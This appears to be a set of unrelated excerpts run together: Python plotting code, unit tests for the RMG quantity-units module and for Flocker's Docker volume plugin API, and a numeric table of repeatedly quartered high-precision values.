plt.hist(self.result.data.estim.sigma.T, bins=100,label=['Sigma X', 'Sigma Y'])
plt.legend()
def plotChiSquare(self):
plt.figure()
m = np.median(self.unfilteredChisq) * 4
plt.hist(self.unfilteredChisq, bins=100, range=[0,m], label='Chi-square values')
if self.chiSqThreshold is not None:
plt.axvline(self.chiSqThreshold, label='Threshold')
plt.legend()
plt.xlabel('Chi-square value (sum((data-model)^2/model)')
def plotSigmaTimeSeries(self, **figargs):
sigmaFramesPerBin = | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. <NAME> (<EMAIL>), #
# Prof. <NAME> (<EMAIL>) and the RMG Team (<EMAIL>) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
"""
This script contains unit tests of the :mod:`rmgpy.quantity` module.
"""
import unittest
import numpy
import rmgpy.constants as constants
import rmgpy.quantity as quantity
################################################################################
class TestAcceleration(unittest.TestCase):
"""
Contains unit tests of the Acceleration unit type object.
"""
def test_mpers2(self):
"""
Test the creation of an acceleration quantity with units of m/s^2.
"""
q = quantity.Acceleration(1.0,"m/s^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m/s^2")
def test_cmpers2(self):
"""
Test the creation of an acceleration quantity with units of cm/s^2.
"""
q = quantity.Acceleration(1.0,"cm/s^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 0.01, delta=1e-8)
self.assertEqual(q.units, "cm/s^2")
################################################################################
class TestArea(unittest.TestCase):
"""
Contains unit tests of the Area unit type object.
"""
def test_m2(self):
"""
Test the creation of an area quantity with units of m^2.
"""
q = quantity.Area(1.0,"m^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^2")
def test_cm2(self):
"""
Test the creation of an area quantity with units of m^2.
"""
q = quantity.Area(1.0,"cm^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-4, delta=1e-10)
self.assertEqual(q.units, "cm^2")
################################################################################
class TestConcentration(unittest.TestCase):
"""
Contains unit tests of the Concentration unit type object.
"""
def test_perm3(self):
"""
Test the creation of an concentration quantity with units of m^-3.
"""
try:
q = quantity.Concentration(1.0,"m^-3")
self.fail('Allowed invalid unit type "m^-3".')
except quantity.QuantityError:
pass
def test_molperm3(self):
"""
Test the creation of an concentration quantity with units of mol/m^3.
"""
q = quantity.Concentration(1.0,"mol/m^3")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "mol/m^3")
def test_moleculesperm3(self):
"""
Test the creation of an concentration quantity with units of molecules/m^3.
"""
q = quantity.Concentration(1.0,"molecules/m^3")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*constants.Na, 1.0, delta=1e-6)
self.assertEqual(q.units, "molecules/m^3")
################################################################################
class TestEnergy(unittest.TestCase):
"""
Contains unit tests of the Energy unit type object.
"""
def test_J(self):
"""
Test the creation of an energy quantity with units of J.
"""
try:
q = quantity.Energy(1.0,"J")
self.fail('Allowed invalid unit type "J".')
except quantity.QuantityError:
pass
def test_Jpermol(self):
"""
Test the creation of an energy quantity with units of J/mol.
"""
q = quantity.Energy(1.0,"J/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "J/mol")
def test_cal(self):
"""
Test the creation of an energy quantity with units of cal.
"""
try:
q = quantity.Energy(1.0,"cal")
self.fail('Allowed invalid unit type "cal".')
except quantity.QuantityError:
pass
def test_calpermol(self):
"""
Test the creation of an energy quantity with units of cal/mol.
"""
q = quantity.Energy(1.0,"cal/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4.184, delta=1e-6)
self.assertEqual(q.units, "cal/mol")
def test_kJ(self):
"""
Test the creation of an energy quantity with units of kJ.
"""
try:
q = quantity.Energy(1.0,"kJ")
self.fail('Allowed invalid unit type "kJ".')
except quantity.QuantityError:
pass
def test_kJpermol(self):
"""
Test the creation of an energy quantity with units of kJ/mol.
"""
q = quantity.Energy(1.0,"kJ/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1000., delta=1e-6)
self.assertEqual(q.units, "kJ/mol")
def test_kcal(self):
"""
Test the creation of an energy quantity with units of kcal.
"""
try:
q = quantity.Energy(1.0,"kcal")
self.fail('Allowed invalid unit type "kcal".')
except quantity.QuantityError:
pass
def test_kcalpermol(self):
"""
Test the creation of an energy quantity with units of kcal/mol.
"""
q = quantity.Energy(1.0,"kcal/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4184., delta=1e-6)
self.assertEqual(q.units, "kcal/mol")
def test_Kelvin(self):
"""
Test the creation of an energy quantity with units of K (not really an energy!).
"""
q = quantity.Energy(10.0,"K")
self.assertAlmostEqual(q.value, 10*8.314472, delta=1e-6)
self.assertEqual(q.units, "J/mol")
################################################################################
class TestDipoleMoment(unittest.TestCase):
"""
Contains unit tests of the DipoleMoment unit type object.
"""
def test_Ctimesm(self):
"""
Test the creation of a dipole moment quantity with units of C*m.
"""
q = quantity.DipoleMoment(1.0,"C*m")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, 6)
self.assertEqual(q.units, "C*m")
def test_D(self):
"""
Test the creation of a dipole moment quantity with units of J/mol.
"""
q = quantity.DipoleMoment(1.0,"De")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*constants.c*1.0e21, 1.0, 6)
self.assertEqual(q.units, "De")
################################################################################
class TestFlux(unittest.TestCase):
"""
Contains unit tests of the Flux unit type object.
"""
def test_perm2pers(self):
"""
Test the creation of a flux quantity with units of m^-2*s^-1.
"""
try:
q = quantity.Flux(1.0,"m^-2*s^-1")
self.fail('Allowed invalid unit type "m^-2*s^-1".')
except quantity.QuantityError:
pass
def test_molperm3(self):
"""
Test the creation of a flux quantity with units of mol/(m^2*s).
"""
q = quantity.Flux(1.0,"mol/(m^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "mol/(m^2*s)")
def test_moleculesperm3(self):
"""
Test the creation of a flux quantity with units of molecules/(m^2*s).
"""
q = quantity.Flux(1.0,"molecules/(m^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*constants.Na, 1.0, delta=1e-6)
self.assertEqual(q.units, "molecules/(m^2*s)")
################################################################################
class TestForce(unittest.TestCase):
"""
Contains unit tests of the Force unit type object.
"""
def test_N(self):
"""
Test the creation of an force quantity with units of N.
"""
q = quantity.Force(1.0,"N")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "N")
################################################################################
class TestFrequency(unittest.TestCase):
"""
Contains unit tests of the Frequency unit type object. Note that, as a
special case, frequencies can be read in several units, but are always
stored internally as cm^-1.
"""
def test_cm_1(self):
"""
Test the creation of a frequency quantity with units of cm^-1.
"""
q = quantity.Frequency(1.0,"cm^-1")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^-1")
def test_s_1(self):
"""
Test the creation of a frequency quantity with units of s^-1.
"""
q = quantity.Frequency(1.0,"s^-1")
self.assertAlmostEqual(q.value, 1./(constants.c*100.), delta=1e-17)
self.assertAlmostEqual(q.value_si, 1./(constants.c*100.), delta=1e-17)
self.assertEqual(q.units, "cm^-1")
def test_K(self):
"""
Test the creation of a frequency quantity with units of K.
"""
q = quantity.Frequency(1.0,"K")
self.assertAlmostEqual(q.value, constants.kB/(constants.h*constants.c*100.), 6)
self.assertAlmostEqual(q.value_si, constants.kB/(constants.h*constants.c*100.), delta=1e-6)
self.assertEqual(q.units, "cm^-1")
def test_eV(self):
"""
Test the creation of a frequency quantity with units of eV.
"""
q = quantity.Frequency(1.0,"eV")
self.assertAlmostEqual(q.value, constants.e/(constants.h*constants.c*100.), 2)
self.assertAlmostEqual(q.value_si, constants.e/(constants.h*constants.c*100.), delta=1e-2)
self.assertEqual(q.units, "cm^-1")
def test_Hz(self):
"""
Test the creation of a frequency quantity with units of Hz.
"""
q = quantity.Frequency(1.0,"Hz")
self.assertAlmostEqual(q.value, 1./(constants.c*100.), delta=1e-17)
self.assertAlmostEqual(q.value_si, 1./(constants.c*100.), delta=1e-17)
self.assertEqual(q.units, "cm^-1")
def test_kHz(self):
"""
Test the creation of a frequency quantity with units of kHz.
"""
q = quantity.Frequency(1.0,"kHz")
self.assertAlmostEqual(q.value, 1e3/(constants.c*100.), delta=1e-14)
self.assertAlmostEqual(q.value_si, 1e3/(constants.c*100.), delta=1e-14)
self.assertEqual(q.units, "cm^-1")
def test_MHz(self):
"""
Test the creation of a frequency quantity with units of MHz.
"""
q = quantity.Frequency(1.0,"MHz")
self.assertAlmostEqual(q.value, 1e6/(constants.c*100.), delta=1e-11)
self.assertAlmostEqual(q.value_si, 1e6/(constants.c*100.), delta=1e-11)
self.assertEqual(q.units, "cm^-1")
def test_GHz(self):
"""
Test the creation of a frequency quantity with units of GHz.
"""
q = quantity.Frequency(1.0,"GHz")
self.assertAlmostEqual(q.value, 1e9/(constants.c*100.), delta=1e-08)
self.assertAlmostEqual(q.value_si, 1e9/(constants.c*100.), delta=1e-08)
self.assertEqual(q.units, "cm^-1")
################################################################################
class TestHeatCapacity(unittest.TestCase):
"""
Contains unit tests of the HeatCapacity unit type object.
"""
def test_JperK(self):
"""
Test the creation of a heat capacity quantity with units of J/K.
"""
try:
q = quantity.HeatCapacity(1.0,"J/K")
self.fail('Allowed invalid unit type "J/K".')
except quantity.QuantityError:
pass
def test_JpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of J/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"J/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "J/(mol*K)")
def test_calperK(self):
"""
Test the creation of a heat capacity quantity with units of cal/K.
"""
try:
q = quantity.HeatCapacity(1.0,"cal/K")
self.fail('Allowed invalid unit type "cal/K".')
except quantity.QuantityError:
pass
def test_calpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of cal/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"cal/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4.184, delta=1e-6)
self.assertEqual(q.units, "cal/(mol*K)")
def test_kJperK(self):
"""
Test the creation of a heat capacity quantity with units of kJ/K.
"""
| |
# Copyright ClusterHQ Inc. See LICENSE file for details.
"""
Tests for the Volumes Plugin API provided by the plugin.
"""
import random
from uuid import uuid4
from bitmath import TiB, GiB, MiB, KiB, Byte
from twisted.web.http import OK, NOT_ALLOWED, NOT_FOUND
from twisted.internet.task import Clock, LoopingCall
from twisted.internet.defer import gatherResults
from hypothesis import given
from hypothesis.strategies import (
sampled_from, builds, integers
)
from pyrsistent import pmap
from eliot.testing import capture_logging
from .._api import VolumePlugin, DEFAULT_SIZE, parse_num, NAME_FIELD
from ...apiclient import FakeFlockerClient, Dataset, DatasetsConfiguration
from ...testtools import CustomException, random_name
from ...restapi import make_bad_request
from ...restapi.testtools import (
build_UNIX_integration_tests, APIAssertionsMixin,
)
# A Hypothesis strategy for generating size expression of volume
# don't bother with kib, or mib it's too small, tib too big.
volume_expression = builds(
lambda expression: b"".join(expression),
expression=sampled_from([u"GB", "gib", "G", "Gb", "gb", "Gib", "g"]),
)
class SimpleCountingProxy(object):
"""
Transparent proxy that counts the number of calls to methods of the
wrapped object.
:ivar _wrapped: Wrapped object.
:ivar call_count: Mapping of method name to number of calls.
"""
def __init__(self, wrapped):
self._wrapped = wrapped
self.call_count = pmap()
def num_calls(self, name):
"""
Return the number of times the given method was called with given
arguments.
:param name: Method name.
:return: Number of calls.
"""
return self.call_count.get(name, 0)
def __getattr__(self, name):
method = getattr(self._wrapped, name)
def counting_proxy(*args, **kwargs):
current_count = self.call_count.get(name, 0)
self.call_count = self.call_count.set(name, current_count + 1)
return method(*args, **kwargs)
return counting_proxy
class APITestsMixin(APIAssertionsMixin):
"""
Helpers for writing tests for the Docker Volume Plugin API.
"""
NODE_A = uuid4()
NODE_B = uuid4()
def initialize(self):
"""
Create initial objects for the ``VolumePlugin``.
"""
self.volume_plugin_reactor = Clock()
self.flocker_client = SimpleCountingProxy(FakeFlockerClient())
# The conditional_create operation used by the plugin relies on
# the passage of time... so make sure time passes! We still use a
# fake clock since some tests want to skip ahead.
self.looping = LoopingCall(
lambda: self.volume_plugin_reactor.advance(0.001))
self.looping.start(0.001)
self.addCleanup(self.looping.stop)
def test_pluginactivate(self):
"""
``/Plugins.Activate`` indicates the plugin is a volume driver.
"""
# Docker 1.8, at least, sends "null" as the body. Our test
# infrastructure has the opposite bug so just going to send some
# other garbage as the body (12345) to demonstrate that it's
# ignored as per the spec which declares no body.
return self.assertResult(b"POST", b"/Plugin.Activate", 12345, OK,
{u"Implements": [u"VolumeDriver"]})
def test_remove(self):
"""
``/VolumeDriver.Remove`` returns a successful result.
"""
return self.assertResult(b"POST", b"/VolumeDriver.Remove",
{u"Name": u"vol"}, OK, {u"Err": u""})
def test_unmount(self):
"""
``/VolumeDriver.Unmount`` returns a successful result.
"""
unmount_id = ''.join(random.choice(
'0123456789abcdef') for n in xrange(64))
return self.assertResult(b"POST", b"/VolumeDriver.Unmount",
{u"Name": u"vol",
u"ID": unicode(unmount_id)},
OK, {u"Err": u""})
def test_unmount_no_id(self):
"""
``/VolumeDriver.Unmount`` returns a successful result.
No ID for backward compatability with Docker < 1.12
"""
return self.assertResult(b"POST", b"/VolumeDriver.Unmount",
{u"Name": u"vol"},
OK, {u"Err": u""})
def test_create_with_profile(self):
"""
Calling the ``/VolumerDriver.Create`` API with an ``Opts`` value
of "profile=[gold,silver,bronze] in the request body JSON create a
volume with a given name with [gold,silver,bronze] profile.
"""
profile = sampled_from(["gold", "silver", "bronze"]).example()
name = random_name(self)
d = self.assertResult(b"POST", b"/VolumeDriver.Create",
{u"Name": name, 'Opts': {u"profile": profile}},
OK, {u"Err": u""})
d.addCallback(
lambda _: self.flocker_client.list_datasets_configuration())
d.addCallback(list)
d.addCallback(lambda result:
self.assertItemsEqual(
result, [
Dataset(dataset_id=result[0].dataset_id,
primary=self.NODE_A,
maximum_size=int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name,
u"clusterhq:flocker:profile":
unicode(profile)})]))
return d
def test_create_with_size(self):
"""
Calling the ``/VolumerDriver.Create`` API with an ``Opts`` value
of "size=<somesize> in the request body JSON create a volume
with a given name and random size between 1-100G
"""
name = random_name(self)
size = integers(min_value=1, max_value=75).example()
expression = volume_expression.example()
size_opt = "".join(str(size))+expression
d = self.assertResult(b"POST", b"/VolumeDriver.Create",
{u"Name": name, 'Opts': {u"size": size_opt}},
OK, {u"Err": u""})
real_size = int(parse_num(size_opt).to_Byte())
d.addCallback(
lambda _: self.flocker_client.list_datasets_configuration())
d.addCallback(list)
d.addCallback(lambda result:
self.assertItemsEqual(
result, [
Dataset(dataset_id=result[0].dataset_id,
primary=self.NODE_A,
maximum_size=real_size,
metadata={NAME_FIELD: name,
u"maximum_size":
unicode(real_size)})]))
return d
@given(expr=volume_expression,
size=integers(min_value=75, max_value=100))
def test_parsenum_size(self, expr, size):
"""
Send different forms of size expressions
to ``parse_num``, we expect G(Gigabyte) size results.
:param expr str: A string representing the size expression
:param size int: A string representing the volume size
"""
expected_size = int(GiB(size).to_Byte())
return self.assertEqual(expected_size,
int(parse_num(str(size)+expr).to_Byte()))
@given(expr=sampled_from(["KB", "MB", "GB", "TB", ""]),
size=integers(min_value=1, max_value=100))
def test_parsenum_all_sizes(self, expr, size):
"""
Send standard size expressions to ``parse_num`` in
many sizes, we expect to get correct size results.
:param expr str: A string representing the size expression
:param size int: A string representing the volume size
"""
if expr is "KB":
expected_size = int(KiB(size).to_Byte())
elif expr is "MB":
expected_size = int(MiB(size).to_Byte())
elif expr is "GB":
expected_size = int(GiB(size).to_Byte())
elif expr is "TB":
expected_size = int(TiB(size).to_Byte())
else:
expected_size = int(Byte(size).to_Byte())
return self.assertEqual(expected_size,
int(parse_num(str(size)+expr).to_Byte()))
@given(size=sampled_from([u"foo10Gb", u"10bar10", "10foogib",
"10Gfoo", "GIB", "bar10foo"]))
def test_parsenum_bad_size(self, size):
"""
Send unacceptable size expressions, upon error
users should expect to receive Flocker's ``DEFAULT_SIZE``
:param size str: A string representing the bad volume size
"""
return self.assertEqual(int(DEFAULT_SIZE.to_Byte()),
int(parse_num(size).to_Byte()))
def create(self, name):
"""
Call the ``/VolumeDriver.Create`` API to create a volume with the
given name.
:param unicode name: The name of the volume to create.
:return: ``Deferred`` that fires when the volume that was created.
"""
return self.assertResult(b"POST", b"/VolumeDriver.Create",
{u"Name": name}, OK, {u"Err": u""})
def test_create_creates(self):
"""
``/VolumeDriver.Create`` creates a new dataset in the configuration.
"""
name = u"myvol"
d = self.create(name)
d.addCallback(
lambda _: self.flocker_client.list_datasets_configuration())
d.addCallback(list)
d.addCallback(lambda result:
self.assertItemsEqual(
result, [
Dataset(dataset_id=result[0].dataset_id,
primary=self.NODE_A,
maximum_size=int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name})]))
return d
def test_create_duplicate_name(self):
"""
If a dataset with the given name already exists,
``/VolumeDriver.Create`` succeeds without create a new volume.
"""
name = u"thename"
# Create a dataset out-of-band with matching name but non-matching
# dataset ID:
d = self.flocker_client.create_dataset(
self.NODE_A, int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name})
d.addCallback(lambda _: self.create(name))
d.addCallback(
lambda _: self.flocker_client.list_datasets_configuration())
d.addCallback(lambda results: self.assertEqual(len(list(results)), 1))
return d
def test_create_duplicate_name_race_condition(self):
"""
If a dataset with the given name is created while the
``/VolumeDriver.Create`` call is in flight, the call does not
result in an error.
"""
name = u"thename"
# Create a dataset out-of-band with matching dataset ID and name
# which the docker plugin won't be able to see.
def create_after_list():
# Clean up the patched version:
del self.flocker_client.list_datasets_configuration
# But first time we're called, we create dataset and lie about
# its existence:
d = self.flocker_client.create_dataset(
self.NODE_A, int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name})
d.addCallback(lambda _: DatasetsConfiguration(
tag=u"1234", datasets={}))
return d
self.flocker_client.list_datasets_configuration = create_after_list
return self.create(name)
def _flush_volume_plugin_reactor_on_endpoint_render(self):
"""
This method patches ``self.app`` so that after any endpoint is
rendered, the reactor used by the volume plugin is advanced repeatedly
until there are no more ``delayedCalls`` pending on the reactor.
"""
real_execute_endpoint = self.app.execute_endpoint
def patched_execute_endpoint(*args, **kwargs):
val = real_execute_endpoint(*args, **kwargs)
while self.volume_plugin_reactor.getDelayedCalls():
pending_calls = self.volume_plugin_reactor.getDelayedCalls()
next_expiration = min(t.getTime() for t in pending_calls)
now = self.volume_plugin_reactor.seconds()
self.volume_plugin_reactor.advance(
max(0.0, next_expiration - now))
return val
self.patch(self.app, 'execute_endpoint', patched_execute_endpoint)
def test_mount(self):
"""
``/VolumeDriver.Mount`` sets the primary of the dataset with matching
name to the current node and then waits for the dataset to
actually arrive.
"""
name = u"myvol"
dataset_id = uuid4()
mount_id = ''.join(random.choice(
'0123456789abcdef') for n in xrange(64))
# Create dataset on a different node:
d = self.flocker_client.create_dataset(
self.NODE_B, int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name},
dataset_id=dataset_id)
self._flush_volume_plugin_reactor_on_endpoint_render()
# Pretend that it takes 5 seconds for the dataset to get established on
# Node A.
self.volume_plugin_reactor.callLater(
5.0, self.flocker_client.synchronize_state)
d.addCallback(lambda _:
self.assertResult(
b"POST", b"/VolumeDriver.Mount",
{u"Name": name, u"ID": unicode(mount_id)}, OK,
{u"Err": u"",
u"Mountpoint": u"/flocker/{}".format(dataset_id)}))
d.addCallback(lambda _: self.flocker_client.list_datasets_state())
def final_assertions(datasets):
self.assertEqual([self.NODE_A],
[d.primary for d in datasets
if d.dataset_id == dataset_id])
# There should be less than 20 calls to list_datasets_state over
# the course of 5 seconds.
self.assertLess(
self.flocker_client.num_calls('list_datasets_state'), 20)
d.addCallback(final_assertions)
return d
def test_mount_no_id(self):
"""
``/VolumeDriver.Mount`` sets the primary of the dataset with matching
name to the current node and then waits for the dataset to
actually arrive.
No ID for backward compatability with Docker < 1.12
"""
name = u"myvol"
dataset_id = uuid4()
# Create dataset on a different node:
d = self.flocker_client.create_dataset(
self.NODE_B, int(DEFAULT_SIZE.to_Byte()),
metadata={NAME_FIELD: name},
dataset_id=dataset_id)
self._flush_volume_plugin_reactor_on_endpoint_render()
# Pretend that it takes 5 seconds for the dataset to get established on
# Node A.
self.volume_plugin_reactor.callLater(
5.0, self.flocker_client.synchronize_state)
d.addCallback(lambda _:
self.assertResult(
b"POST", b"/VolumeDriver.Mount",
{u"Name": name}, OK,
{u"Err": u"",
u"Mountpoint": u"/flocker/{}".format(dataset_id)}))
d.addCallback(lambda _: self.flocker_client.list_datasets_state())
def final_assertions(datasets):
self.assertEqual([self.NODE_A],
[d.primary for d in datasets
if d.dataset_id == dataset_id])
# There should be less than 20 calls to list_datasets_state over
# the course of 5 seconds.
| |
1567 3.732446480362260781946102655672169E-944 1.866223240181130390973051327836085E-944
1568 9.331116200905651954865256639180425E-945 4.665558100452825977432628319590213E-945
1569 2.332779050226412988716314159795107E-945 1.166389525113206494358157079897553E-945
1570 5.831947625566032471790785399487765E-946 2.915973812783016235895392699743883E-946
1571 1.457986906391508117947696349871942E-946 7.289934531957540589738481749359708E-947
1572 3.644967265978770294869240874679854E-947 1.822483632989385147434620437339927E-947
1573 9.112418164946925737173102186699635E-948 4.556209082473462868586551093349818E-948
1574 2.278104541236731434293275546674909E-948 1.139052270618365717146637773337455E-948
1575 5.695261353091828585733188866687275E-949 2.847630676545914292866594433343638E-949
1576 1.423815338272957146433297216671819E-949 7.119076691364785732166486083359095E-950
1577 3.559538345682392866083243041679548E-950 1.779769172841196433041621520839774E-950
1578 8.89884586420598216520810760419887E-951 4.449422932102991082604053802099435E-951
1579 2.224711466051495541302026901049718E-951 1.112355733025747770651013450524859E-951
1580 5.561778665128738853255067252624295E-952 2.780889332564369426627533626312148E-952
1581 1.390444666282184713313766813156074E-952 6.95222333141092356656883406578037E-953
1582 3.476111665705461783284417032890185E-953 1.738055832852730891642208516445093E-953
1583 8.690279164263654458211042582225465E-954 4.345139582131827229105521291112733E-954
1584 2.172569791065913614552760645556367E-954 1.086284895532956807276380322778183E-954
1585 5.431424477664784036381901613890915E-955 2.715712238832392018190950806945458E-955
1586 1.357856119416196009095475403472729E-955 6.789280597080980045477377017363645E-956
1587 3.394640298540490022738688508681823E-956 1.697320149270245011369344254340911E-956
1588 8.486600746351225056846721271704555E-957 4.243300373175612528423360635852278E-957
1589 2.121650186587806264211680317926139E-957 1.060825093293903132105840158963070E-957
1590 5.30412546646951566052920079481535E-958 2.652062733234757830264600397407675E-958
1591 1.326031366617378915132300198703838E-958 6.630156833086894575661500993519188E-959
1592 3.315078416543447287830750496759594E-959 1.657539208271723643915375248379797E-959
1593 8.287696041358618219576876241898985E-960 4.143848020679309109788438120949493E-960
1594 2.071924010339654554894219060474747E-960 1.035962005169827277447109530237373E-960
1595 5.179810025849136387235547651186865E-961 2.589905012924568193617773825593433E-961
1596 1.294952506462284096808886912796717E-961 6.474762532311420484044434563983583E-962
1597 3.237381266155710242022217281991792E-962 1.618690633077855121011108640995896E-962
1598 8.09345316538927560505554320497948E-963 4.04672658269463780252777160248974E-963
1599 2.02336329134731890126388580124487E-963 1.011681645673659450631942900622435E-963
1600 5.058408228368297253159714503112175E-964 2.529204114184148626579857251556088E-964
1601 1.264602057092074313289928625778044E-964 6.32301028546037156644964312889022E-965
1602 3.16150514273018578322482156444511E-965 1.580752571365092891612410782222555E-965
1603 7.903762856825464458062053911112775E-966 3.951881428412732229031026955556388E-966
1604 1.975940714206366114515513477778194E-966 9.87970357103183057257756738889097E-967
1605 4.939851785515915286288783694445485E-967 2.469925892757957643144391847222743E-967
1606 1.234962946378978821572195923611372E-967 6.174814731894894107860979618056858E-968
1607 3.087407365947447053930489809028429E-968 1.543703682973723526965244904514215E-968
1608 7.718518414868617634826224522571075E-969 3.859259207434308817413112261285538E-969
1609 1.929629603717154408706556130642769E-969 9.648148018585772043532780653213845E-970
1610 4.824074009292886021766390326606923E-970 2.412037004646443010883195163303461E-970
1611 1.206018502323221505441597581651731E-970 6.030092511616107527207987908258653E-971
1612 3.015046255808053763603993954129327E-971 1.507523127904026881801996977064663E-971
1613 7.537615639520134409009984885323315E-972 3.768807819760067204504992442661658E-972
1614 1.884403909880033602252496221330829E-972 9.422019549400168011262481106654145E-973
1615 4.711009774700084005631240553327073E-973 2.355504887350042002815620276663536E-973
1616 1.177752443675021001407810138331768E-973 5.88876221837510500703905069165884E-974
1617 2.94438110918755250351952534582942E-974 1.47219055459377625175976267291471E-974
1618 7.36095277296888125879881336457355E-975 3.680476386484440629399406682286775E-975
1619 1.840238193242220314699703341143388E-975 9.201190966211101573498516705716938E-976
1620 4.600595483105550786749258352858469E-976 2.300297741552775393374629176429235E-976
1621 1.150148870776387696687314588214618E-976 5.750744353881938483436572941073088E-977
1622 2.875372176940969241718286470536544E-977 1.437686088470484620859143235268272E-977
1623 7.18843044235242310429571617634136E-978 3.59421522117621155214785808817068E-978
1624 1.79710761058810577607392904408534E-978 8.9855380529405288803696452204267E-979
1625 4.49276902647026444018482261021335E-979 2.246384513235132220092411305106675E-979
1626 1.123192256617566110046205652553338E-979 5.615961283087830550231028262766688E-980
1627 2.807980641543915275115514131383344E-980 1.403990320771957637557757065691672E-980
1628 7.01995160385978818778878532845836E-981 3.50997580192989409389439266422918E-981
1629 1.75498790096494704694719633211459E-981 8.77493950482473523473598166057295E-982
1630 4.387469752412367617367990830286475E-982 2.193734876206183808683995415143238E-982
1631 1.096867438103091904341997707571619E-982 5.484337190515459521709988537858095E-983
1632 2.742168595257729760854994268929048E-983 1.371084297628864880427497134464524E-983
1633 6.85542148814432440213748567232262E-984 3.42771074407216220106874283616131E-984
1634 1.713855372036081100534371418080655E-984 8.569276860180405502671857090403275E-985
1635 4.284638430090202751335928545201638E-985 2.142319215045101375667964272600819E-985
1636 1.071159607522550687833982136300410E-985 5.355798037612753439169910681502048E-986
1637 2.677899018806376719584955340751024E-986 1.338949509403188359792477670375512E-986
1638 6.69474754701594179896238835187756E-987 3.34737377350797089948119417593878E-987
1639 1.67368688675398544974059708796939E-987 8.36843443376992724870298543984695E-988
1640 4.184217216884963624351492719923475E-988 2.092108608442481812175746359961738E-988
1641 1.046054304221240906087873179980869E-988 5.230271521106204530439365899904345E-989
1642 2.615135760553102265219682949952173E-989 1.307567880276551132609841474976086E-989
1643 6.53783940138275566304920737488043E-990 3.268919700691377831524603687440215E-990
1644 1.634459850345688915762301843720108E-990 8.172299251728444578811509218600538E-991
1645 4.086149625864222289405754609300269E-991 2.043074812932111144702877304650135E-991
1646 1.021537406466055572351438652325068E-991 5.107687032330277861757193261625338E-992
1647 2.553843516165138930878596630812669E-992 1.276921758082569465439298315406335E-992
1648 6.384608790412847327196491577031675E-993 3.192304395206423663598245788515838E-993
1649 1.596152197603211831799122894257919E-993 7.980760988016059158995614471289595E-994
1650 3.990380494008029579497807235644798E-994 1.995190247004014789748903617822399E-994
1651 9.975951235020073948744518089111995E-995 4.987975617510036974372259044555998E-995
1652 2.493987808755018487186129522277999E-995 1.246993904377509243593064761139000E-995
1653 6.23496952188754621796532380569500E-996 3.11748476094377310898266190284750E-996
1654 1.55874238047188655449133095142375E-996 7.79371190235943277245665475711875E-997
1655 3.896855951179716386228327378559375E-997 1.948427975589858193114163689279688E-997
1656 9.74213987794929096557081844639844E-998 4.87106993897464548278540922319922E-998
1657 2.43553496948732274139270461159961E-998 1.217767484743661370696352305799805E-998
1658 6.088837423718306853481761528999025E-999 3.044418711859153426740880764499513E-999
1659 1.522209355929576713370440382249757E-999 7.611046779647883566852201911248783E-1000
1660 3.805523389823941783426100955624392E-1000 1.902761694911970891713050477812196E-1000
